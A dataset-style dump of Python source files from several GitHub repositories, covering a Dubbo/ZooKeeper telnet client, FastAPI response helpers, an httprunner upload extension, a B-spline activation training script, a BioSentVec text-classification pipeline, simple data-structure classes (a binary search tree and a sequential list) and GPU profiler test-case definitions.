metadata | text |
---|---|
{
"source": "JokerChat/dubbo_fastapi",
"score": 2
} |
#### File: JokerChat/dubbo_fastapi/bm_dubbo.py
```python
import telnetlib
import json
import re
from kazoo.client import KazooClient
from urllib import parse
from config import ZK_CONFIG
class BmDubbo(object):
prompt = 'dubbo>'
def __init__(self, host, port):
self.conn = self.conn(host, port)
def conn(self,host, port):
conn = telnetlib.Telnet()
try:
            # time out the connection attempt after 3 seconds
conn.open(host, port, timeout=3)
except BaseException:
return False
return conn
def command(self, str_=""):
        # emulate the dubbo telnet console, e.g. dubbo>invoke ...
        if self.conn:
self.conn.write(str_.encode() + b'\n')
data = self.conn.read_until(self.prompt.encode())
return data
else:
return False
def invoke(self, service_name, method_name, arg):
command_str = "invoke {0}.{1}({2})".format(service_name, method_name, arg)
data = self.command(command_str)
try:
            # decode the bytes as utf-8
data = data.decode("utf-8").split('\n')[0].strip()
except BaseException:
            # fall back to gbk decoding
data = data.decode("gbk").split('\n')[0].strip()
return data
def ls_invoke(self, service_name):
command_str = "ls -l {0}".format(service_name)
data = self.command(command_str)
if "No such service" in data.decode("utf-8"):
return False
else:
data = data.decode("utf-8").split('\n')
key = ['methodName', 'paramType','type']
dubbo_list = []
for i in range(0, len(data) - 1):
value = []
dubbo_name = data[i].strip().split(' ')[1]
method_name = re.findall(r"(.*?)[(]", dubbo_name)[0]
value.append(method_name)
paramType = re.findall(r"[(](.*?)[)]", dubbo_name)[0]
paramTypeList = paramType.split(',')
if len(paramTypeList) ==1:
paramTypeList = paramTypeList[0]
value.append(paramTypeList)
if 'java.lang' in paramType or 'java.math' in paramType:
value.append(0)
elif not paramType:
value.append(1)
elif 'List' in paramType:
value.append(2)
else:
value.append(3)
dubbo_list.append(dict(zip(key, value)))
return dubbo_list
def param_data(self,service_name,method_name):
dubbo_data = self.ls_invoke(service_name)
if dubbo_data:
dubbo_list = dubbo_data
if dubbo_list:
for i in dubbo_list:
for v in i.values():
if v == method_name:
param_key = ['paramType','type']
param_value = [i.get('paramType'),i.get('type')]
return dict(zip(param_key,param_value))
else:
return False
else:
return False
class GetDubboService(object):
def __init__(self):
self.hosts = ZK_CONFIG
self.zk = self.zk_conn()
def zk_conn(self):
try:
zk = KazooClient(hosts=self.hosts, timeout=2)
            zk.start(2)  # connect to zookeeper with a 2-second timeout
except BaseException as e:
print(str(e))
return False
return zk
def get_dubbo_info(self, dubbo_service):
dubbo_service_data = {}
try:
            # first, list every dubbo service registered in zookeeper
all_node = self.zk.get_children('/dubbo')
            # keep only the services whose name matches the requested one
node = [i for i in all_node if dubbo_service in i]
            # look up the provider details of each matched service,
            # skipping entries that have no providers
for i in node:
if self.zk.get_children(f'/dubbo/{i}/providers'):
dubbo_data = self.zk.get_children(f'/dubbo/{i}/providers')
for index, a in enumerate(dubbo_data):
url = parse.urlparse(parse.unquote(a)).netloc
host, port = url.split(":")
conn = BmDubbo(host, port)
status = conn.command("")
if status:
data = dubbo_data[index]
break
self.zk.stop()
except BaseException as e:
return dubbo_service_data
        # parse.unquote: URL-decode the provider string
        # parse.urlparse: split it into URL components
        # url_data.query: the query-string component
        # parse.parse_qsl: parse the query string into key/value pairs
url_data = parse.urlparse(parse.unquote(data))
query_data = dict(parse.parse_qsl(url_data.query))
query_data['methods'] = query_data['methods'].split(",")
dubbo_service_data['url'] = url_data.netloc
dubbo_service_data['dubbo_service'] = dubbo_service
dubbo_service_data.update(query_data)
return dubbo_service_data
if __name__ == '__main__':
conn1 = GetDubboService()
if conn1.zk:
data = conn1.get_dubbo_info('xxx')
print(json.dumps(data))
else:
print("连接zk服务异常")
```
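For orientation, a minimal usage sketch of the telnet client above; the host, port and service name are placeholders (not taken from the repository), and importing the module assumes `config.ZK_CONFIG` resolves:
```python
# Hypothetical provider address and service name, for illustration only.
from bm_dubbo import BmDubbo

dubbo = BmDubbo("10.0.0.8", 20880)
if dubbo.conn:
    # list the methods exposed by the service, then invoke one with a JSON-style argument
    print(dubbo.ls_invoke("com.example.DemoService"))
    print(dubbo.invoke("com.example.DemoService", "sayHello", '"world"'))
```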
#### File: JokerChat/dubbo_fastapi/ResponseNormal.py
```python
from fastapi import status
from fastapi.responses import JSONResponse, Response
from typing import Union
from fastapi.encoders import jsonable_encoder
# Parameters after * are keyword-only: callers must pass them by name.
# The "-> Response" annotation declares that the function returns a Response object.
def res_200(*, data: Union[list, dict, str,None]) -> Response:
content = {
'responseCode': 200,
'responseMsg': "请求成功",
'responseData': data,
}
return JSONResponse(
status_code=status.HTTP_200_OK,
content=jsonable_encoder(content)
)
def res_400(*, msg: str = "系统异常") -> Response:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={
'responseCode': 400,
'responseMsg': msg
}
)
``` |
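A minimal sketch of how these helpers are typically consumed from a FastAPI route; the app and route below are illustrative, not part of the repository:
```python
from fastapi import FastAPI
from ResponseNormal import res_200, res_400

app = FastAPI()

@app.get("/ping")
async def ping():
    try:
        # data is keyword-only, so it must be passed by name
        return res_200(data={"pong": True})
    except Exception as e:
        return res_400(msg=str(e))
```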
{
"source": "jokerdebug/httprunner",
"score": 3
} |
#### File: ext/uploader/__init__.py
```python
import os
import sys
from typing import Text, NoReturn
from httprunner.models import TStep, FunctionsMapping
from httprunner.parser import parse_variables_mapping
from loguru import logger
try:
import filetype
from requests_toolbelt import MultipartEncoder
UPLOAD_READY = True
except ModuleNotFoundError:
UPLOAD_READY = False
def ensure_upload_ready():
if UPLOAD_READY:
return
msg = """
uploader extension dependencies uninstalled, install first and try again.
install with pip:
$ pip install requests_toolbelt filetype
or you can install httprunner with optional upload dependencies:
$ pip install "httprunner[upload]"
"""
logger.error(msg)
sys.exit(1)
def prepare_upload_step(step: TStep, functions: FunctionsMapping) -> "NoReturn":
""" preprocess for upload test
replace `upload` info with MultipartEncoder
Args:
step: teststep
{
"variables": {},
"request": {
"url": "http://httpbin.org/upload",
"method": "POST",
"headers": {
"Cookie": "session=AAA-BBB-CCC"
},
"upload": {
"file": "data/file_to_upload"
"md5": "123"
}
}
}
functions: functions mapping
"""
if not step.request.upload:
return
ensure_upload_ready()
params_list = []
for key, value in step.request.upload.items():
step.variables[key] = value
params_list.append(f"{key}=${key}")
params_str = ", ".join(params_list)
step.variables["m_encoder"] = "${multipart_encoder(" + params_str + ")}"
# parse variables
step.variables = parse_variables_mapping(step.variables, functions)
step.request.headers["Content-Type"] = "${multipart_content_type($m_encoder)}"
step.request.data = "$m_encoder"
def multipart_encoder(**kwargs):
""" initialize MultipartEncoder with uploading fields.
Returns:
MultipartEncoder: initialized MultipartEncoder object
"""
def get_filetype(file_path):
file_type = filetype.guess(file_path)
if file_type:
return file_type.mime
else:
return "text/html"
ensure_upload_ready()
fields_dict = {}
for key, value in kwargs.items():
if isinstance(value, bool):
value = str(value).lower()
if os.path.isabs(value):
# value is absolute file path
_file_path = value
is_exists_file = os.path.isfile(value)
else:
# value is not absolute file path, check if it is relative file path
from httprunner.loader import load_project_meta
project_meta = load_project_meta("")
_file_path = os.path.join(project_meta.RootDir, value)
is_exists_file = os.path.isfile(_file_path)
if is_exists_file:
# value is file path to upload
filename = os.path.basename(_file_path)
mime_type = get_filetype(_file_path)
# TODO: fix ResourceWarning for unclosed file
file_handler = open(_file_path, "rb")
fields_dict[key] = (filename, file_handler, mime_type)
else:
fields_dict[key] = value
return MultipartEncoder(fields=fields_dict)
def multipart_content_type(m_encoder) -> Text:
""" prepare Content-Type for request headers
Args:
m_encoder: MultipartEncoder object
Returns:
content type
"""
ensure_upload_ready()
return m_encoder.content_type
``` |
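A minimal sketch of calling the two public helpers directly, outside of a TStep; it assumes `requests_toolbelt` and `filetype` are installed, that the package is importable as `httprunner.ext.uploader`, and the file path and field values are placeholders:
```python
from httprunner.ext.uploader import multipart_encoder, multipart_content_type

# fields that are existing file paths are uploaded as files; everything else is sent as plain form data
m_encoder = multipart_encoder(file="/tmp/file_to_upload.txt", md5="123")
headers = {"Content-Type": multipart_content_type(m_encoder)}
# the encoder is then used as the request body, e.g.
# requests.post("http://httpbin.org/post", data=m_encoder, headers=headers)
```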
{
"source": "JoKerDii/BsplineLayer",
"score": 3
} |
#### File: JoKerDii/BsplineLayer/test_af.py
```python
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
from PIL import Image
from torch import optim
from torch.utils.data import Dataset
from torchvision import transforms
from BSplineActivation import BSplineActivation
class FashionMNIST(Dataset):
"""
Dataset from Kaggle competition
"""
def __init__(self):
self.transform = transforms.Compose([transforms.ToTensor()])
fashion_df = pd.read_csv(
'/home/zhendi/wei/splines-nn/fashion-mnist_train.csv')
self.labels = fashion_df.label.values
self.images = fashion_df.iloc[:, 1:].values.astype(
'uint8').reshape(-1, 28, 28)
def __len__(self):
return len(self.images)
def __getitem__(self, idx):
label = self.labels[idx]
img = Image.fromarray(self.images[idx])
if self.transform:
img = self.transform(img)
return img, label
def train_mlp_model(model, config):
"""
Function trains the model and prints out the training loss.
"""
criterion = nn.NLLLoss().to(config.device)
learning_rate = 0.003
epochs = 5
optimizer = optim.Adam(model.parameters(), lr=learning_rate)
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
images = images.view(images.shape[0], -1).to(config.device)
labels = labels.to(config.device)
log_ps = model(images)
loss = criterion(log_ps, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
else:
print(f"Training loss: {running_loss}")
def train_cnn_model(model, config):
'''
Function trains the model and prints out the training loss.
'''
criterion = nn.NLLLoss().to(config.device)
learning_rate = 0.003
epochs = 5
optimizer = optim.Adam(model.parameters(), lr=learning_rate)
for e in range(epochs):
running_loss = 0
for images, labels in trainloader:
# images = images.view(images.shape[0], -1)
images = images.to(config.device)
labels = labels.to(config.device)
log_ps = model(images)
loss = criterion(log_ps, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
else:
print(f"Training loss: {running_loss}")
class MLP(nn.Module):
'''
Simple fully-connected classifier model to demonstrate activation.
'''
def __init__(self, config):
super(MLP, self).__init__()
self.fc1 = nn.Linear(784, 256) # (N, 28 * 28) -> (N, 256)
self.fc2 = nn.Linear(256, 128) # -> (N, 128)
self.fc3 = nn.Linear(128, 64) # -> (N, 64)
self.fc4 = nn.Linear(64, 10) # -> (N, 10)
self.a1 = BSplineActivation(num_activations=256,
mode='linear', device=config.device)
self.a2 = BSplineActivation(num_activations=128,
mode='linear', device=config.device)
self.a3 = BSplineActivation(num_activations=64,
mode='linear', device=config.device)
def forward(self, x):
x = x.view(x.shape[0], -1)
x = self.a1(self.fc1(x))
x = self.a2(self.fc2(x))
x = self.a3(self.fc3(x))
x = F.log_softmax(self.fc4(x), dim=1)
return x
class CNN(nn.Module):
'''
    Simple convolutional classifier model to demonstrate activation.
'''
def __init__(self, config):
super(CNN, self).__init__()
self.c1 = 6
self.conv1 = nn.Conv2d(1, self.c1, 5)
self.pool = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(self.c1 * 12 * 12, 512) # 864
self.fc2 = nn.Linear(512, 128)
self.fc3 = nn.Linear(128, 64)
self.fc4 = nn.Linear(64, 10)
self.a1 = BSplineActivation(
num_activations=self.c1, device=config.device)
self.a2 = torch.nn.ReLU()
def forward(self, x):
x = self.conv1(x)
x = self.a1(x)
x = self.pool(x)
x = x.view(-1, self.c1 * 12 * 12)
x = self.a2(self.fc1(x))
x = self.a2(self.fc2(x))
x = self.a2(self.fc3(x))
x = F.log_softmax(self.fc4(x), dim=1)
return x
class Config(object):
"""parameters"""
def __init__(self):
self.device = 'cuda:3'
# self.device = 'cpu'
if __name__ == "__main__":
config = Config()
print(config.device)
trainset = FashionMNIST()
trainloader = torch.utils.data.DataLoader(
trainset, batch_size=64, shuffle=True)
# train CNN
model = CNN(config).to(config.device)
train_cnn_model(model, config)
# train MLP
# model = MLP(config).to(config.device)
    # train_mlp_model(model, config)
``` |
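As a quick sanity check of the flattened feature size used in the CNN above (the `self.c1 * 12 * 12  # 864` line), the shape arithmetic can be verified directly; this snippet is illustrative and not part of the original script:
```python
import torch
import torch.nn as nn

x = torch.zeros(1, 1, 28, 28)                   # one FashionMNIST-sized image
y = nn.MaxPool2d(2, 2)(nn.Conv2d(1, 6, 5)(x))   # 28 -> 24 after the 5x5 conv, -> 12 after 2x2 pooling
print(y.shape)                                  # torch.Size([1, 6, 12, 12]); 6 * 12 * 12 = 864
```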
{
"source": "JoKerDii/Personalized-Medicine",
"score": 3
} |
#### File: Personalized-Medicine/word-embedding-and-bow/biosentvec-rf.py
```python
import os
import re
import warnings
import numpy as np
import pandas as pd
import sent2vec
import spacy
from keras.utils import np_utils
from nltk import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from nltk.tokenize import RegexpTokenizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import balanced_accuracy_score, f1_score, log_loss
from sklearn.model_selection import StratifiedKFold, cross_val_predict, train_test_split
from sklearn.preprocessing import LabelEncoder
from spacy.lang.en.stop_words import STOP_WORDS
warnings.filterwarnings("ignore")
### Import Data
for dirname, _, filenames in os.walk("/home/zhendi/pm/data/dataset"):
for filename in filenames:
print(os.path.join(dirname, filename))
data = pd.read_csv(
    "/home/zhendi/pm/data/dataset/training_variants.zip", encoding="ISO-8859-1"
)
print("Number of data points : ", data.shape[0])
print("Number of features : ", data.shape[1])
print("Features : ", data.columns.values)
data_text = pd.read_csv(
    "/home/zhendi/pm/data/dataset/training_text.zip",
    sep=r"\|\|",
    engine="python",
    names=["ID", "TEXT"],
    skiprows=1,
    encoding="ISO-8859-1",
)
print("Number of data points : ", data_text.shape[0])
print("Number of features : ", data_text.shape[1])
print("Features : ", data_text.columns.values)
### Data Preprocessing
tokenizer = RegexpTokenizer(r"\w+'?\w+|\w+")
stop_words = stopwords.words("english")
exceptionStopWords = {
"again",
"against",
"ain",
"almost",
"among",
"amongst",
"amount",
"anyhow",
"anyway",
"aren",
"aren't",
"below",
"bottom",
"but",
"cannot",
"couldn",
"couldn't",
"didn",
"didn't",
"doesn",
"doesn't",
"don",
"don't",
"done",
"down",
"except",
"few",
"hadn",
"hadn't",
"hasn",
"hasn't",
"haven",
"haven't",
"however",
"isn",
"isn't",
"least",
"mightn",
"mightn't",
"move",
"much",
"must",
"mustn",
"mustn't",
"needn",
"needn't",
"neither",
"never",
"nevertheless",
"no",
"nobody",
"none",
"noone",
"nor",
"not",
"nothing",
"should",
"should've",
"shouldn",
"shouldn't",
"too",
"top",
"up",
"very" "wasn",
"wasn't",
"well",
"weren",
"weren't",
"won",
"won't",
"wouldn",
"wouldn't",
}
stop_words = set(stop_words).union(STOP_WORDS)
final_stop_words = stop_words - exceptionStopWords
nlp = spacy.load("en", disable=["parser", "tagger", "ner"])
def make_token(x):
""" Tokenize the text (remove punctuations and spaces)"""
return tokenizer.tokenize(str(x))
def remove_stopwords(x):
return [token for token in x if token not in final_stop_words]
def lemmatization(x):
lemma_result = []
for words in x:
doc = nlp(words)
for token in doc:
lemma_result.append(token.lemma_)
return lemma_result
puncts = [
",",
".",
'"',
":",
")",
"(",
"-",
"!",
"?",
"|",
";",
"'",
"$",
"&",
"/",
"[",
"]",
">",
"%",
"=",
"#",
"*",
"+",
"\\",
"•",
"~",
"@",
"£",
"·",
"_",
"{",
"}",
"©",
"^",
"®",
"`",
"<",
"→",
"°",
"€",
"™",
"›",
"♥",
"←",
"×",
"§",
"″",
"′",
"Â",
"█",
"½",
"à",
"…",
"“",
"★",
"”",
"–",
"●",
"â",
"►",
"−",
"¢",
"²",
"¬",
"░",
"¶",
"↑",
"±",
"¿",
"▾",
"═",
"¦",
"║",
"―",
"¥",
"▓",
"—",
"‹",
"─",
"▒",
":",
"¼",
"⊕",
"▼",
"▪",
"†",
"■",
"’",
"▀",
"¨",
"▄",
"♫",
"☆",
"é",
"¯",
"♦",
"¤",
"▲",
"è",
"¸",
"¾",
"Ã",
"⋅",
"‘",
"∞",
"∙",
")",
"↓",
"、",
"│",
"(",
"»",
",",
"♪",
"╩",
"╚",
"³",
"・",
"╦",
"╣",
"╔",
"╗",
"▬",
"❤",
"ï",
"Ø",
"¹",
"≤",
"‡",
"√",
]
def clean_text(x):
x = str(x)
for punct in puncts:
if punct in x:
x = x.replace(punct, "")
return x
def pipeline(total_text, index, column):
"""A pipeline to process text data for BioSentVec"""
if type(total_text) is str:
all_text = []
# sentence tokenizer and case lower
for sent in sent_tokenize(total_text):
text = " ".join(word_tokenize(sent))
all_text.append(text.lower())
all_sents = []
for sent in all_text:
# clean punctuations
sent = clean_text(sent)
# print(type(sent))
sent = word_tokenize(sent)
sent = remove_stopwords(sent)
sent = lemmatization(sent)
string = " ".join(sent)
# clean numbers
sent_nonum = re.sub(r"\b\d+\b", "", string)
string = " ".join(sent_nonum.split())
all_sents.append(string)
data_text["TEXT"][index] = all_sents
for index, row in data_text.iterrows():
if type(row["TEXT"]) is str:
pipeline(row["TEXT"], index, "TEXT")
else:
print("there is no text description for id:", index)
### Merge genes, variations and text data by ID
result = pd.merge(data, data_text, on="ID", how="left")
result.loc[result["TEXT"].isnull(), "TEXT"] = result["Gene"] + " " + result["Variation"]
result.Gene = result.Gene.str.replace(r"\s+", "_")
result.Variation = result.Variation.str.replace(r"\s+", "_")
labels = result[["Class"]] - 1
# save result
# pd.to_pickle(result, "/home/zhendi/pm/scripts/result_sentVec_strict.pkl")
# load result
# result = pd.read_pickle("/home/zhendi/pm/scripts/result_sentVec_strict.pkl")
# Define the model
import sent2vec
model_path = "/data/zhendi/nlp/BioSentVec_PubMed_MIMICIII-bigram_d700.bin"
model = sent2vec.Sent2vecModel()
try:
model.load_model(model_path)
except Exception as e:
print(e)
print("model successfully loaded")
def BioSentVec_transform(model, data):
# determine the dimensionality of vectors
V = model.embed_sentence("once upon a time .")
D = V.shape[1]
print("D = V.shape[1]: ", D)
X = np.zeros((len(data), D))
emptycount = 0
n = 0
for record in data:
try:
vec = model.embed_sentences(record)
except KeyError:
print("there is a sent with no match.")
pass
if len(vec) > 0:
X[n] = vec.mean(axis=0)
else:
emptycount += 1
n += 1
print("Number of samples with no words found: %s / %s" % (emptycount, len(data)))
return X
def build_onehot_Features(df):
"""This is a function to extract features, df argument should be
a pandas dataframe with only Gene, Variation, and TEXT columns"""
# make a copy
temp = df.copy()
# onehot encode gene and variation
print("Onehot Encoding...")
temp = pd.get_dummies(temp, columns=["Gene", "Variation"], drop_first=True)
# Sent2Vec vectorize TEXT
print("Sent2Vec Vectorizing...")
    temp_sent2v = BioSentVec_transform(model, temp["TEXT"])
del temp["TEXT"]
# rename the colnames
tempc = list(temp.columns)
for i in range(np.shape(temp_sent2v)[1]):
tempc.append("sent2v_" + str(i + 1))
temp = pd.concat([temp, pd.DataFrame(temp_sent2v, index=temp.index)], axis=1)
temp.columns = tempc
return temp
trainDf = build_onehot_Features(result[["Gene", "Variation", "TEXT"]])
# save
# pd.to_pickle(trainDf, "/home/zhendi/pm/scripts/Onehot_biosentvec_trainDf_strict.pkl")
# laod
# trainDf = pd.read_pickle("/home/zhendi/pm/scripts/Onehot_biosentvec_trainDf_strict.pkl")
### Split data into training data and testing data
X_train, X_test, y_train, y_test = train_test_split(
trainDf, labels, test_size=0.2, random_state=5, stratify=labels
)
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
le = LabelEncoder()
y_train = le.fit_transform(y_train)
y_test = le.transform(y_test)
encoded_test_y = np_utils.to_categorical((le.inverse_transform(y_test)))
def evaluate_features(X, y, clf=None):
if clf is None:
clf = RandomForestClassifier(n_estimators=400, random_state=5)
probas = cross_val_predict(
clf,
X,
y,
cv=StratifiedKFold(n_splits=3),
n_jobs=-1,
method="predict_proba",
verbose=2,
)
pred_indices = np.argmax(probas, axis=1)
classes = np.unique(y)
preds = classes[pred_indices]
print("Log loss: {}".format(log_loss(y, probas)))
print("Accuracy: {}".format(balanced_accuracy_score(y, preds)))
print("F1 score: {}".format(f1_score(y, preds, average="micro")))
evaluate_features(X_train, y_train)
``` |
{
"source": "JokerDLord/GISDataStructure",
"score": 4
} |
#### File: JokerDLord/GISDataStructure/BSTree.py
```python
class BSNode():
def __init__(self,k,left_=None,right_=None):
self.key=k
self.left=left_
self.right=right_
class BSTree:
def __init__(self):
self.root = None
    # search
def search(self,k):
if self.root is None:
return None
pn=self.root
        while pn is not None:  # keep walking until the search runs off the tree
            if k > pn.key:  # descend into the right subtree
                pn = pn.right
            elif k < pn.key:  # descend into the left subtree
                pn = pn.left
            elif k == pn.key:  # found it
return print("{} is found".format(pn.key))
return print("{} is not found".format(k))
    # insert
def insert(self,k):
        if self.root is None:  # empty tree: the new key becomes the root
self.root=BSNode(k)
return None
else:
pn1=self.root
while pn1 is not None:
pn2=pn1
                if k > pn1.key:  # larger than the current key: descend right
                    pn1 = pn1.right
                    flg = 1
                elif k < pn1.key:  # smaller than the current key: descend left
                    pn1 = pn1.left
                    flg = 2
                elif k == pn1.key:  # the key already exists
                    return None
pn1 = BSNode(k)
            if flg == 1:  # attach the new node as the right child
                pn2.right = pn1
            elif flg == 2:  # attach the new node as the left child
                pn2.left = pn1
    # delete an element
def delete(self,k):
if self.root is None:
return False
else:
            pn1 = self.root  # start from the root
            flg = 0
            while pn1 is not None:  # walk down until the key is found or we fall off the tree
                if k > pn1.key:  # descend right, flg = 1
                    pn2 = pn1
                    pn1 = pn1.right
                    flg = 1
                elif k < pn1.key:  # descend left, flg = 2
                    pn2 = pn1
                    pn1 = pn1.left
                    flg = 2
                elif k == pn1.key:  # key found: pn1 is the node to delete
                    break
if pn1 is None:
return False
elif flg==1:
#pn1==pn2.right
if (pn1.left is None) &(pn1.right is None):#无左右节点 直接删除叶节点
pn2.right=None
elif (pn1.left is None):#左节点为空则将右节点上接
pn2.right=pn1.right
elif (pn1.right is None):#右节点为空则将左节点上接
pn2.right=pn1.left
else: #左右子树均不为空的节点
bn2=pn1.left#当前节点的左子树bn2
while (bn2 is not None):#左子树的右路径到底
p2=bn2#p2为当前bn2的父节点
bn2=bn2.right#右子树下行
p2.right = pn1.right#将左子树的最大节点链接pn1的右节点
pn2.right=pn1.left#pn1左节点代替pn1
elif flg==2:
#pn1==pn2.left
if (pn1.left is None)&(pn1.right is None):#直接删除叶节点
pn2.right=None
elif (pn1.left is None):#左节点为空则将右节点上接
pn2.left=pn1.right
elif (pn1.right is None):#右节点为空则将左节点上接
pn2.left=pn1.left
else:#删除左右子树均不为空的根节点
bn2=pn1.left
while (bn2 is not None):
p2=bn2
bn2=bn2.right
p2.right=pn1.right#将左子树的最大节点链接pn1的右节点
pn2.left=pn1.left#pn1左节点代替pn1
            elif flg == 0:  # the node to delete is the root itself
if (self.root.right is None) & (self.root.left is None):
self.root=None
elif self.root.left is None:
self.root=self.root.right
elif self.root.right is None:
self.root=self.root.left
else:
bn3=self.root.left
while (bn3 is not None):
bn4=bn3
bn3=bn3.right
                    bn4.right = pn1.right  # hang the root's right subtree off the left subtree's rightmost node
                    self.root = self.root.left  # the left child becomes the new root
    # preorder traversal of the binary tree, defined recursively
def preorder(self,t):
if t is None:
return
print(repr(t.key),end=" ")
self.preorder(t.left)
self.preorder(t.right)
    # inorder traversal, defined recursively; for a BST it visits the keys in ascending order
def midorder(self,t):
if t is None:
return
self.midorder(t.left)
print(repr(t.key),end=" ")
self.midorder(t.right)
if __name__ == "__main__":
bst=BSTree()
lnum=[63,90,70,55,67,42,98,83,10,45,58]
for num in lnum:
bst.insert(num)
print("bst先序/中序遍历:")
bst.preorder(bst.root)
print()
bst.midorder(bst.root)
print()
bst.search(10)
    print("delete 63, then preorder / inorder traversal:")
    bst.delete(63)
bst.preorder(bst.root)
print()
bst.midorder(bst.root)
print()
    bst.search(63)
```
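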
#### File: JokerDLord/GISDataStructure/SeqList.py
```python
class SeqList(list):  # sequential (array-backed) list class
    def __init__(self, lst=None):
        # use None as the default to avoid sharing one mutable default list across instances
        self._array = lst if lst is not None else []
        self._length = len(self._array)
    def get(self, idx):
        if idx >= self._length or idx < 0:
            return print("index out of range")
        return self._array[idx]
    def find(self, key):
        # return the index of the first element equal to key, or None if absent
for i in range(len(self._array)):
if self._array[i] == key:
return i
return None
    def insert(self, idx, elem):
        # validate the index before growing the array
        if (idx > len(self._array)) or (idx < 0):
            return False
        k = len(self._array) - 1
        self._array.append(0)
        while k >= idx:
            self._array[k + 1] = self._array[k]
            k -= 1
        self._array[idx] = elem
        self._length += 1
        return True
    def delete(self, idx):
        if idx >= self._length or idx < 0:
            return print("index out of range")
        # shift the trailing elements one slot to the left, then drop the last slot
        for i in range(idx, len(self._array) - 1):
            self._array[i] = self._array[i + 1]
        del self._array[-1]
        self._length -= 1
        return self._array
def length(self):
return len(self._array)
    def __repr__(self):  # render the sequential list like a plain Python list
return "{}".format(self._array)
    def traverse(self):  # traverse the list and return its elements as a string
s=""
for i in self._array:
s=s+str(i)+" "
return s
if __name__ == "__main__":
    slst = [1, 2, 6, 9]
    slst = SeqList(slst)  # build a sequential list slst
    print(slst.find(2))  # index of the element 2
    print(slst.insert(2, 4))  # insert 4 before index 2
    print(slst)  # print the sequential list
    print(slst.length())  # print the length of the list
    print(slst.delete(2))  # delete the element at index 2
    print(slst.traverse())  # traverse and print the list
    # load the GDP data from exercise 2 into a sequential list
with open("gdp.txt","r") as f:
gdps = SeqList()
count = 0
for row in f:
year,GDP = row.split(",")
gdps.insert(count,float(GDP))
count+=1
    print(gdps)  # print the sequential list
``` |
{
"source": "Jokerella/discord.py-altyapi-bot",
"score": 2
} |
#### File: discord.py-altyapi-bot/cogs/Deneme.py
```python
from discord.ext import commands
import discord
from random import choice as seçenek  # alias random.choice under the Turkish name used below
class emirhan(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_message(self, message):
try:
print(str(message.author)+": "+str(message.content))
except Exception:
print(str(message.author)+":")
if "sa" in message.clean_content.lower():
await message.channel.send(seçenek(["AL<NAME>", "as", "as kardeşim"]))
def setup(bot):
bot.add_cog(emirhan(bot))
``` |
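A minimal sketch of loading this cog from the bot's entry point, in the discord.py 1.x style that matches the synchronous `setup()` above; the prefix and token are placeholders:
```python
from discord.ext import commands

bot = commands.Bot(command_prefix="!")
bot.load_extension("cogs.Deneme")  # runs setup(bot), which registers the cog
bot.run("YOUR_BOT_TOKEN")
```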
{
"source": "Jokeren/hpctoolkit-cuda-memory-patch",
"score": 2
} |
#### File: hpctoolkit-cuda-memory-patch/python/test_cases.py
```python
from collections import namedtuple
import os
from utils import cleanup
class Test(object):
Case = namedtuple('Case', ['path', 'versions',
'command', 'options', 'cleanup'])
cases = dict()
# unit test cases
cases['vectorAdd.f128'] = Case(
path='samples/vectorAdd.f128', versions=[], command='./vectorAdd', options=[], cleanup=True)
cases['op_graph_simple'] = Case(
path='samples/op_graph_simple', versions=[], command='./main', options=[], cleanup=True)
cases['op_pattern_simple'] = Case(
path='samples/op_pattern_simple', versions=[], command='./main', options=[], cleanup=True)
cases['stress'] = Case(path='samples/stress', versions=[],
command='./stress', options=[], cleanup=True)
# sample test cases
cases['bfs'] = Case(path='samples/bfs', command='./bfs', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['../data/graph1MW_6.txt'], cleanup=True)
cases['backprop'] = Case(path='samples/backprop', command='./backprop', versions=[
'vp-opt1', 'vp-opt2', 'vp-opt'], options=['65536'], cleanup=True)
cases['cfd'] = Case(path='samples/cfd', command='./euler3d', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['../data/fvcorr.domn.097K'], cleanup=True)
cases['hotspot'] = Case(path='samples/hotspot', command='./hotspot', versions=['vp-opt'], options=[
'512', '2', '2', '../data/temp_512', '../data/power_512', 'output.out'], cleanup=True)
cases['hotspot3D'] = Case(path='samples/hotspot3D', command='./3D', versions=['vp-opt'], options=[
'512', '8', '100', '../data/power_512x8', '../data/temp_512x8', 'output.out'], cleanup=True)
cases['huffman'] = Case(path='samples/huffman', command='./pavle', versions=[
'vp-opt'], options=['../data/test1024_H2.206587175259.in'], cleanup=True)
cases['lavaMD'] = Case(path='samples/lavaMD', command='./lavaMD',
versions=['vp-opt'], options=['-boxes1d', '10'], cleanup=True)
cases['particlefilter'] = Case(path='samples/particlefilter', command='./particlefilter_float', versions=[
'vp-opt'], options=['-x', '128', '-y', '128', '-z', '10', '-np', '1000'], cleanup=True)
cases['pathfinder'] = Case(path='samples/pathfinder', command='./pathfinder',
versions=['vp-opt'], options=['100000', '100', '20'], cleanup=True)
cases['srad'] = Case(path='samples/srad_v1', command='./srad', versions=['vp-opt1',
'vp-opt2', 'vp-opt'], options=['10', '0.5', '502', '458'], cleanup=True)
cases['streamcluster'] = Case(path='samples/streamcluster', command='./sc_gpu', versions=['vp-opt'], options=[
'10', '20', '256', '65536', '65536', '1000', 'none', 'output.txt', '1'], cleanup=True)
# application cases
cases['barracuda'] = Case(path='samples/barracuda', command='./barracuda', versions=['vp-opt'],
options=['aln', 'sample_data/Saccharomyces_cerevisiae.SGD1.01.50.dna_rm.toplevel.fa',
'sample_data/sample_reads.fastq', '>', 'quicktest.sai'], cleanup=False)
cases['castro'] = Case(path='samples/Castro/Exec/hydro_tests/Sedov', command='Castro2d.gnu.CUDA.ex', versions=['vp-opt'],
options=['./inputs.2d.cyl_in_cartcoords'], cleanup=False)
cases['darknet'] = Case(path='samples/darknet', command='./darknet', versions=['vp-opt'],
options=['detector', 'test', './cfg/coco.data', './cfg/yolov4.cfg',
'./yolov4.weights', 'data/dog.jpg', '-i', '0', '-thresh', '0.25'], cleanup=False)
cases['deepwave'] = Case(path='samples/deepwave', command='./Deepwave_SEAM_example1.py', versions=['vp-opt'],
options=[], cleanup=False)
cases['namd'] = Case(path='samples/NAMD/Linux-x86_64-g++', command='./namd3',
versions=['vp-opt'], options=['../alain'], cleanup=False)
